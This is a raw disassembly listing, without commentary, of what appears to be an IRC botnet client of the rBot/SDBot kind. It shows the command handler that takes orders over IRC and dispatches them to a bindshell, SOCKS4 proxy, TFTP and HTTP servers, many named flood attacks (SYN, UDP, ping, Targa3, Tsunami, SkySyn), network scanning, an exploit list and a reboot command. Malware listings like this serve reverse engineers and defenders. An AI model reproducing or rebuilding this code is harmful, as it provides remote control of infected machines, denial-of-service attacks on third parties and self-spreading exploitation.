lea eax, [ebp+var_1B80]
push offset aS ; "%s"
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+var_1B94]
push [ebp+esi+Str2]
push offset aS_0 ; "%s"
push eax ; Dest
call _sprintf
push [ebp+esi+var_80] ; Str
call _atoi
mov [ebp+var_19FC], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1B9C], eax
lea eax, [ebp+var_C0]
push 7Fh ; Count
push eax ; Source
lea eax, [ebp+var_1A7C]
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 1Ch
mov [ebp+var_19F4], eax
mov eax, [ebp+var_8]
mov [ebp+var_19F0], eax
lea eax, [ebp+var_1A7C]
push eax
lea eax, [ebp+var_1B80]
push eax
lea eax, [ebp+Dst]
push offset asc_43FD64 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Ah ; int
push eax ; Source
call sub_40B756
add esp, 1Ch
mov [ebp+var_19F8], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1B9C]
push ebx
push eax
push offset sub_416D25
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_19F8]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz loc_4025C8
loc_402493: ; CODE XREF: sub_401CC7+7E0�j
cmp [ebp+var_19EC], ebx
jnz loc_408637
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_402493
; ---------------------------------------------------------------------------
loc_4024A9: ; CODE XREF: sub_401CC7+661�j
; sub_401CC7+676�j
push esi ; Str2
push offset aNotice_1 ; "NOTICE"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4024C1
mov [ebp+var_4], 1
loc_4024C1: ; CODE XREF: sub_401CC7+7F1�j
mov edi, [ebp+Format]
cmp edi, ebx
jz loc_402085
push offset asc_43FD00 ; "#"
push edi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_4024E5
cmp [ebp+var_4], ebx
jz short loc_4024F1
loc_4024E5: ; CODE XREF: sub_401CC7+817�j
lea edi, [ebp+var_C0]
mov [ebp+Format], edi
loc_4024F1: ; CODE XREF: sub_401CC7+81C�j
cmp [ebp+Str2], ebx
jz loc_402085
inc [ebp+Str2]
jz short loc_40253B
cmp [ebp+Source], ebx
jz short loc_40253B
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
push eax ; MaxCount
lea eax, [ebp+Str1]
push [ebp+Str2] ; Str2
push eax ; Str1
call _strncmp
add esp, 10h
neg eax
sbb eax, eax
add eax, 4
mov [ebp+var_A4], eax
jmp short loc_402541
; ---------------------------------------------------------------------------
loc_40253B: ; CODE XREF: sub_401CC7+83C�j
; sub_401CC7+841�j
mov eax, [ebp+var_A4]
loc_402541: ; CODE XREF: sub_401CC7+872�j
shl eax, 2
mov [ebp+arg_8], eax
mov esi, [ebp+eax+var_90]
cmp esi, ebx
jz loc_402085
push esi ; Str2
push offset dword_43FD04 ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40235C
cmp byte ptr [edi], 23h
jz short loc_40258C
mov eax, dword_4E2F8C
mov eax, off_43F15C[eax*4]
cmp [eax], bl
jz short loc_40258C
push eax
push edi
push offset dword_43FD10
jmp loc_40207A
; ---------------------------------------------------------------------------
loc_40258C: ; CODE XREF: sub_401CC7+8A7�j
; sub_401CC7+8B7�j
push esi ; Str2
push offset dword_43FD2C ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40235C
mov eax, [ebp+arg_8]
mov eax, dword ptr [ebp+eax+Args]
cmp eax, ebx
jz loc_40235C
cmp byte ptr [edi], 23h
jz loc_40235C
push eax
push edi
push offset dword_43FD34
jmp loc_40207A
; ---------------------------------------------------------------------------
loc_4025C8: ; CODE XREF: sub_401CC7+7C6�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_43FD94
jmp loc_408628
; ---------------------------------------------------------------------------
loc_4025D9: ; CODE XREF: sub_401CC7+6E7�j
lea eax, [ebp+var_C0]
push eax
push [ebp+esi+Format]
push offset asc_43FDD0 ; "-"
loc_4025EC: ; CODE XREF: sub_401CC7+7EF1�j
; sub_401CC7+7F58�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 10h
jmp loc_408637
; ---------------------------------------------------------------------------
loc_402600: ; CODE XREF: sub_401CC7+6DB�j
push dword ptr [ebp+esi+Args] ; Str2
push offset aChat ; "CHAT"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40274F
cmp [ebp+var_A8], ebx
jz loc_402728
push 1Bh
call sub_40B99E
test eax, eax
pop ecx
jnz loc_402717
push [ebp+esi+Str2]
lea eax, [ebp+var_2AA8]
push offset aS_1 ; "%s"
push eax ; Dest
call _sprintf
push [ebp+esi+var_80] ; Str
call _atoi
mov [ebp+var_2910], eax
mov eax, [ebp+arg_4]
mov [ebp+var_2AB0], eax
lea eax, [ebp+var_C0]
push 7Fh ; Count
push eax ; Source
lea eax, [ebp+var_2990]
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 1Ch
mov [ebp+var_2908], eax
mov eax, [ebp+var_8]
mov [ebp+var_2904], eax
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+Dst]
push offset asc_43FE20 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Bh ; int
push eax ; Source
call sub_40B756
add esp, 18h
mov [ebp+var_290C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2AB0]
push ebx
push eax
push offset sub_4167BF
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_290C]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_402706
loc_4026F0: ; CODE XREF: sub_401CC7+A3D�j
cmp [ebp+var_2900], ebx
jnz loc_408637
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_4026F0
; ---------------------------------------------------------------------------
loc_402706: ; CODE XREF: sub_401CC7+A27�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_43FE40
jmp loc_408628
; ---------------------------------------------------------------------------
loc_402717: ; CODE XREF: sub_401CC7+96A�j
lea eax, [ebp+var_C0]
push eax
push offset unk_43FE78
jmp loc_408628
; ---------------------------------------------------------------------------
loc_402728: ; CODE XREF: sub_401CC7+95A�j
lea eax, [ebp+var_C0]
push eax
push offset unk_43FEA8
jmp loc_408628
; ---------------------------------------------------------------------------
loc_402739: ; CODE XREF: sub_401CC7+6C0�j
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
mov al, [eax]
cmp al, byte_43F094
mov [edi], ecx
jnz loc_402085
loc_40274F: ; CODE XREF: sub_401CC7+94E�j
mov edi, [edi]
push edi ; Str2
push offset aLogin ; "login"
mov [ebp+arg_8], edi
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409B1E
push edi ; Str2
push offset asc_43FEE4 ; "l"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409B1E
cmp [ebp+var_A8], ebx
jnz short loc_4027A0
push dword ptr [ebp+Args] ; Str2
push offset a332_3 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_409B16
loc_4027A0: ; CODE XREF: sub_401CC7+ABD�j
cmp [ebp+arg_28], ebx
jnz loc_409B16
xor edi, edi
cmp dword_43F494, ebx
jle loc_402955
mov [ebp+arg_20], offset dword_455298
loc_4027BE: ; CODE XREF: sub_401CC7+B16�j
push [ebp+arg_8] ; Str2
push [ebp+arg_20] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_4027E4
add [ebp+arg_20], 0B8h
inc edi
cmp edi, dword_43F494
jl short loc_4027BE
jmp loc_402955
; ---------------------------------------------------------------------------
loc_4027E4: ; CODE XREF: sub_401CC7+B06�j
push offset asc_440034 ; " :"
push [ebp+Src] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz loc_402085
mov cl, byte_43F094
imul edi, 0B8h
mov [eax+2], cl
mov cl, byte_43F094
mov [eax+3], cl
lea ecx, dword_4552B0[edi]
push 9Fh ; Count
add eax, 4
push ecx ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+esi+var_50]
add esp, 0Ch
mov [ebp+arg_8], 0Fh
mov [ebp+arg_20], eax
loc_402839: ; CODE XREF: sub_401CC7+C23�j
push [ebp+arg_8]
lea eax, [ebp+SubStr]
push offset aD ; "$%d-"
push eax ; Dest
call _sprintf
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Str
call _strstr
add esp, 14h
test eax, eax
jz short loc_4028A5
mov eax, [ebp+arg_20]
cmp [eax], ebx
jz short loc_4028A5
lea eax, dword_455298[edi]
push eax ; Str
call _strlen
add [ebp+var_C], eax
pop ecx
jz short loc_4028E0
mov eax, [ebp+arg_20]
push dword ptr [eax-4] ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4028E0
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_418C07
add esp, 0Ch
jmp short loc_4028E0
; ---------------------------------------------------------------------------
loc_4028A5: ; CODE XREF: sub_401CC7+B9A�j
; sub_401CC7+BA1�j
mov eax, [ebp+arg_20]
cmp [eax], ebx
jnz short loc_4028E0
lea eax, [ebp+SubStr]
push 2 ; Count
push eax ; Source
lea eax, [ebp+var_94]
push eax ; Dest
call _strncpy
lea eax, [ebp+var_94]
mov [ebp+var_92], bl
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_418C07
add esp, 18h
loc_4028E0: ; CODE XREF: sub_401CC7+BB3�j
; sub_401CC7+BC7�j ...
dec [ebp+arg_8]
sub [ebp+arg_20], 4
cmp [ebp+arg_8], ebx
jg loc_402839
lea eax, [ebp+esi+var_50]
mov [ebp+arg_8], 10h
mov edi, eax
loc_4028FD: ; CODE XREF: sub_401CC7+C82�j
push [ebp+arg_8]
lea eax, [ebp+SubStr]
push offset aD_0 ; "$%d"
push eax ; Dest
call _sprintf
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Str
call _strstr
add esp, 14h
test eax, eax
jz short loc_402940
mov eax, [edi]
cmp eax, ebx
jz short loc_402940
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_418C07
add esp, 0Ch
loc_402940: ; CODE XREF: sub_401CC7+C5E�j
; sub_401CC7+C64�j
dec [ebp+arg_8]
sub edi, 4
cmp [ebp+arg_8], ebx
jg short loc_4028FD
mov [ebp+var_2C4], 1
loc_402955: ; CODE XREF: sub_401CC7+AEA�j
; sub_401CC7+B18�j
mov eax, [ebp+esi+var_90]
mov al, [eax]
cmp al, byte_43F094
jz short loc_402972
cmp [ebp+var_2C4], ebx
jz loc_402B67
loc_402972: ; CODE XREF: sub_401CC7+C9D�j
push [ebp+Source] ; Source
mov edi, [ebp+Src]
push offset aMe ; "$me"
push edi ; Src
call sub_418C07
lea eax, [ebp+var_C0]
push eax ; Source
push offset aUser ; "$user"
push edi ; Src
call sub_418C07
push [ebp+Format] ; Source
push offset aChan ; "$chan"
push edi ; Src
call sub_418C07
push ebx ; Str1
push ebx ; int
lea eax, [ebp+SubStr]
push 2 ; int
push eax ; Dest
call sub_40B44F
push eax ; Source
push offset aRndnick ; "$rndnick"
push edi ; Src
call sub_418C07
add esp, 40h
push [ebp+arg_14] ; Source
push offset aServer ; "$server"
push edi ; Src
call sub_418C07
mov edi, offset aChr ; "$chr("
push edi ; SubStr
push [ebp+Src] ; Str
call _strstr
add esp, 14h
loc_4029E4: ; CODE XREF: sub_401CC7+E19�j
test eax, eax
jz loc_402AE5
push offset aChr_0 ; "$chr("
push [ebp+Src] ; Str
call _strstr
mov [ebp+Source], eax
add eax, 5
push 4 ; Count
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; Dest
call _strncpy
lea eax, [ebp+SubStr]
push offset asc_44007C ; ")"
push eax ; Str
call _strtok
add esp, 1Ch
cmp [ebp+SubStr], 30h
jl short loc_402A34
cmp [ebp+SubStr], 39h
jle short loc_402A4A
loc_402A34: ; CODE XREF: sub_401CC7+D62�j
push 3 ; Count
lea eax, [ebp+SubStr]
push offset a63 ; "63"
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_402A4A: ; CODE XREF: sub_401CC7+D6B�j
lea eax, [ebp+SubStr]
push eax ; Str
call _atoi
test eax, eax
pop ecx
jle short loc_402A70
lea eax, [ebp+SubStr]
push eax ; Str
call _atoi
pop ecx
mov [ebp+var_94], al
jmp short loc_402A84
; ---------------------------------------------------------------------------
loc_402A70: ; CODE XREF: sub_401CC7+D92�j
call _rand
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_94], dl
loc_402A84: ; CODE XREF: sub_401CC7+DA7�j
lea eax, [ebp+SubStr]
mov [ebp+var_93], bl
push eax ; Str
call _strlen
mov [ebp+arg_8], eax
push 0Ch ; Size
lea eax, [ebp+SubStr]
push ebx ; Val
push eax ; Dst
call _memset
mov eax, [ebp+arg_8]
add eax, 6
push eax ; Count
lea eax, [ebp+SubStr]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+var_94]
push eax ; Source
lea eax, [ebp+SubStr]
push eax ; SubStr
push [ebp+Src] ; Src
call sub_418C07
push edi ; SubStr
push [ebp+Src] ; Str
call _strstr
add esp, 30h
jmp loc_4029E4
; ---------------------------------------------------------------------------
loc_402AE5: ; CODE XREF: sub_401CC7+D1F�j
mov edi, 1FFh
lea eax, [ebp+Str]
push edi ; Count
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+Str]
push edi ; Count
push eax ; Source
lea eax, [ebp+var_4AF0]
push eax ; Dest
call _strncpy
lea eax, [ebp+var_4AF0]
push offset asc_440084 ; " "
push eax ; Str
call _strtok
add esp, 20h
mov [ebp+var_90], eax
lea edi, [ebp+Args]
mov [ebp+Source], 1Fh
loc_402B35: ; CODE XREF: sub_401CC7+E83�j
push offset asc_440088 ; " "
push ebx ; Str
call _strtok
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+Source]
pop ecx
jnz short loc_402B35
mov ecx, [ebp+esi+var_90]
lea eax, [ebp+esi+var_90]
cmp ecx, ebx
jz loc_402085
add ecx, 3
mov [eax], ecx
loc_402B67: ; CODE XREF: sub_401CC7+CA5�j
mov edi, [ebp+esi+var_90]
push edi ; Str2
push offset aRndnick_0 ; "rndnick"
mov [ebp+arg_8], edi
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409AC4
push edi ; Str2
push offset aRn ; "rn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409AC4
push edi ; Str2
push offset aDie ; "die"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404BE7
push edi ; Str2
push offset aD_1 ; "d"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404BE7
push edi ; Str2
push offset aLogout ; "logout"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404B3F
push edi ; Str2
push offset aLo ; "lo"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404B3F
push edi ; Str2
push offset aVersion ; "version"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404B30
push edi ; Str2
push offset aVer ; "ver"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404B30
push edi ; Str2
push offset aDedication ; "dedication"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404B26
push edi ; Str2
push offset aDed ; "ded"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404B26
push edi ; Str2
push offset aSpeedtest ; "speedtest"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404B0D
push edi ; Str2
push offset aSt ; "st"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404B0D
push edi ; Str2
push offset aSecure ; "secure"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404A0F
push edi ; Str2
push offset aSec ; "sec"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404A0F
push edi ; Str2
push offset aUnsecure ; "unsecure"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404A0F
push edi ; Str2
push offset aUnsec ; "unsec"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404A0F
push edi ; Str2
push offset aBindshell ; "bindshell"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404909
push edi ; Str2
push offset aBd ; "bd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404909
push edi ; Str2
push offset aBindshellstop ; "bindshellstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402D2B
push dword ptr [ebp+esi+Args] ; Str
push 6 ; int
push offset aServer_0 ; "Server"
push offset dword_440394 ; int
loc_402D0F: ; CODE XREF: sub_401CC7+10B2�j
; sub_401CC7+10D8�j ...
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push [ebp+arg_4] ; int
call sub_40B9E4
add esp, 20h
jmp loc_402085
; ---------------------------------------------------------------------------
loc_402D2B: ; CODE XREF: sub_401CC7+1033�j
push edi ; Str2
push offset aSocks4 ; "socks4"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047E7
push edi ; Str2
push offset aS4 ; "s4"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047E7
push edi ; Str2
push offset aSocks4stop ; "socks4stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402D7B
push dword ptr [ebp+esi+Args]
push 19h
push offset aServer_1 ; "Server"
push offset dword_44042C
jmp short loc_402D0F
; ---------------------------------------------------------------------------
loc_402D7B: ; CODE XREF: sub_401CC7+109D�j
push edi ; Str2
push offset aRloginstop ; "rloginstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402DA4
push dword ptr [ebp+esi+Args]
push 9
push offset aServer_2 ; "Server"
push offset dword_440450
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_402DA4: ; CODE XREF: sub_401CC7+10C3�j
push edi ; Str2
push offset aHttpstop ; "httpstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402DCD
push dword ptr [ebp+esi+Args]
push 3
push offset aServer_3 ; "Server"
push offset dword_440474
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_402DCD: ; CODE XREF: sub_401CC7+10EC�j
push edi ; Str2
push offset aLogstop ; "logstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402DF6
push dword ptr [ebp+esi+Args]
push 25h
push offset aLogList ; "Log list"
push offset dword_440498
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_402DF6: ; CODE XREF: sub_401CC7+1115�j
push edi ; Str2
push offset aRedirectstop ; "redirectstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402E1F
push dword ptr [ebp+esi+Args]
push 18h
push offset aTcpRedirect ; "TCP redirect"
push offset dword_4404C4
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_402E1F: ; CODE XREF: sub_401CC7+113E�j
push edi ; Str2
push offset aDdos_stop ; "ddos.stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402E48
push dword ptr [ebp+esi+Args]
push 0Dh
push offset aDdosFlood ; "DDoS flood"
push offset dword_4404EC
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_402E48: ; CODE XREF: sub_401CC7+1167�j
push edi ; Str2
push offset aSynstop ; "synstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402E71
push dword ptr [ebp+esi+Args]
push 0Eh
push offset aSynFlood ; "Syn flood"
push offset dword_44050C
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_402E71: ; CODE XREF: sub_401CC7+1190�j
push edi ; Str2
push offset aSkysynstop ; "skysynstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402E9A
push dword ptr [ebp+esi+Args]
push 10h
push offset aSkysynFlood ; "SkySyn flood"
push offset dword_440534
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_402E9A: ; CODE XREF: sub_401CC7+11B9�j
push edi ; Str2
push offset aTarga3stop ; "targa3stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402EC3
push dword ptr [ebp+esi+Args]
push 11h
push offset aTarga3Flood ; "Targa3 flood"
push offset dword_440560
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_402EC3: ; CODE XREF: sub_401CC7+11E2�j
push edi ; Str2
push offset aWonkstop ; "wonkstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402EEC
push dword ptr [ebp+esi+Args]
push 12h
push offset aWonkFlood ; "Wonk flood"
push offset dword_440588
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_402EEC: ; CODE XREF: sub_401CC7+120B�j
push edi ; Str2
push offset aPacketstop ; "packetstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_403042
mov esi, dword ptr [ebp+esi+Args]
mov edi, [ebp+arg_4]
push esi ; Str
push 0Dh ; int
push offset aDdosFlood_0 ; "DDoS flood"
push offset dword_4405AC ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B9E4
push esi ; Str
push 0Eh ; int
push offset aSynFlood_0 ; "Syn flood"
push offset dword_4405C4 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B9E4
add esp, 40h
push esi ; Str
push 17h ; int
push offset aUdpFlood ; "UDP flood"
push offset dword_4405DC ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B9E4
push esi ; Str
push 16h ; int
push offset aPingFlood ; "Ping flood"
push offset dword_4405F4 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B9E4
add esp, 40h
push esi ; Str
push 11h ; int
push offset aTarga3Flood_0 ; "Targa3 flood"
push offset dword_440610 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B9E4
push esi ; Str
push 12h ; int
push offset aWonkFlood_0 ; "Wonk flood"
push offset dword_44062C ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B9E4
add esp, 40h
push esi ; Str
push 0Fh ; int
push offset aTsunamiFlood ; "Tsunami flood"
push offset dword_440648 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B9E4
push esi ; Str
push 13h ; int
push offset aWisdomAttack ; "Wisdom attack"
push offset dword_440668 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B9E4
add esp, 40h
push esi ; Str
push 10h ; int
push offset aSkysynFlood_0 ; "SkySyn flood"
push offset dword_440688 ; int
push 1 ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push edi ; int
call sub_40B9E4
push ebx ; int
push [ebp+var_4] ; int
push offset unk_440698 ; int
push [ebp+Format] ; Str
push edi ; int
call sub_409D34
add esp, 34h
jmp loc_402085
; ---------------------------------------------------------------------------
loc_403042: ; CODE XREF: sub_401CC7+1234�j
push edi ; Str2
push offset aTsunamistop ; "tsunamistop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40306B
push dword ptr [ebp+esi+Args]
push 0Fh
push offset aTsunamiFlood_0 ; "Tsunami flood"
push offset dword_4406E8
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_40306B: ; CODE XREF: sub_401CC7+138A�j
push edi ; Str2
push offset aWisdomstop ; "wisdomstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_403094
push dword ptr [ebp+esi+Args]
push 13h
push offset aWisdomAttack_0 ; "Wisdom attack"
push offset dword_440714
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_403094: ; CODE XREF: sub_401CC7+13B3�j
push edi ; Str2
push offset aUdpstop ; "udpstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4030BD
push dword ptr [ebp+esi+Args]
push 17h
push offset aUdpFlood_0 ; "UDP flood"
push offset dword_440738
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_4030BD: ; CODE XREF: sub_401CC7+13DC�j
push edi ; Str2
push offset aPingstop ; "pingstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4030E6
push dword ptr [ebp+esi+Args]
push 16h
push offset aPingFlood_0 ; "Ping flood"
push offset dword_44075C
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_4030E6: ; CODE XREF: sub_401CC7+1405�j
push edi ; Str2
push offset aTftpstop ; "tftpstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40310F
push dword ptr [ebp+esi+Args]
push 5
push offset aServer_4 ; "Server"
push offset dword_44077C
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_40310F: ; CODE XREF: sub_401CC7+142E�j
push edi ; Str2
push offset aFindfilestop ; "findfilestop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047CF
push edi ; Str2
push offset aFfstop ; "ffstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047CF
push edi ; Str2
push offset aProcsstop ; "procsstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047B7
push edi ; Str2
push offset aPsstop ; "psstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047B7
push edi ; Str2
push offset aClonestop ; "clonestop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40318C
push dword ptr [ebp+esi+Args]
push 1Fh
push offset aClone ; "Clone"
push offset dword_440808
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_40318C: ; CODE XREF: sub_401CC7+14AB�j
push edi ; Str2
push offset aSecurestop ; "securestop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4031B5
push dword ptr [ebp+esi+Args]
push 22h
push offset aSecure_0 ; "Secure"
push offset dword_44082C
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_4031B5: ; CODE XREF: sub_401CC7+14D4�j
push edi ; Str2
push offset aScanstop ; "scanstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4031DE
push dword ptr [ebp+esi+Args]
push 0Bh
push offset aScan ; "Scan"
push offset dword_440850
jmp loc_402D0F
; ---------------------------------------------------------------------------
loc_4031DE: ; CODE XREF: sub_401CC7+14FD�j
push edi ; Str2
push offset aScanstats ; "scanstats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047A1
push edi ; Str2
push offset aStats ; "stats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4047A1
push edi ; Str2
push offset aTransferstats ; "transferstats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40478B
push edi ; Str2
push offset aTrstats ; "trstats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40478B
push edi ; Str2
push offset aConnectbacksta ; "connectbackstats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404775
push edi ; Str2
push offset aCbstats ; "cbstats"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404775
push edi ; Str2
push offset aExploitlist ; "exploitlist"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40475F
push edi ; Str2
push offset aExplist ; "explist"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40475F
push edi ; Str2
push offset aReconnect ; "reconnect"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404740
push edi ; Str2
push offset aR ; "r"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404740
push edi ; Str2
push offset aDisconnect ; "disconnect"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40471E
push edi ; Str2
push offset aDc ; "dc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40471E
push edi ; Str2
push offset aQuit_0 ; "quit"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4046D6
push edi ; Str2
push offset aQ ; "q"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4046D6
push edi ; Str2
push offset aStatus ; "status"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4046C2
push edi ; Str2
push offset aS_2 ; "s"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4046C2
push edi ; Str2
push offset aId ; "id"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40468B
push edi ; Str2
push offset aI_0 ; "i"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40468B
push edi ; Str2
push offset aReboot ; "reboot"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4033AA
call sub_4190D4
test eax, eax
mov eax, offset asc_4409C8 ; "-"
jnz short loc_40337C
mov eax, offset unk_4409E8
loc_40337C: ; CODE XREF: sub_401CC7+16AE�j
push eax ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 1Ch
jmp loc_408637
; ---------------------------------------------------------------------------
loc_4033AA: ; CODE XREF: sub_401CC7+16A0�j
push edi ; Str2
push offset aThreads ; "threads"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4045AC
push edi ; Str2
push offset aT ; "t"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4045AC
push edi ; Str2
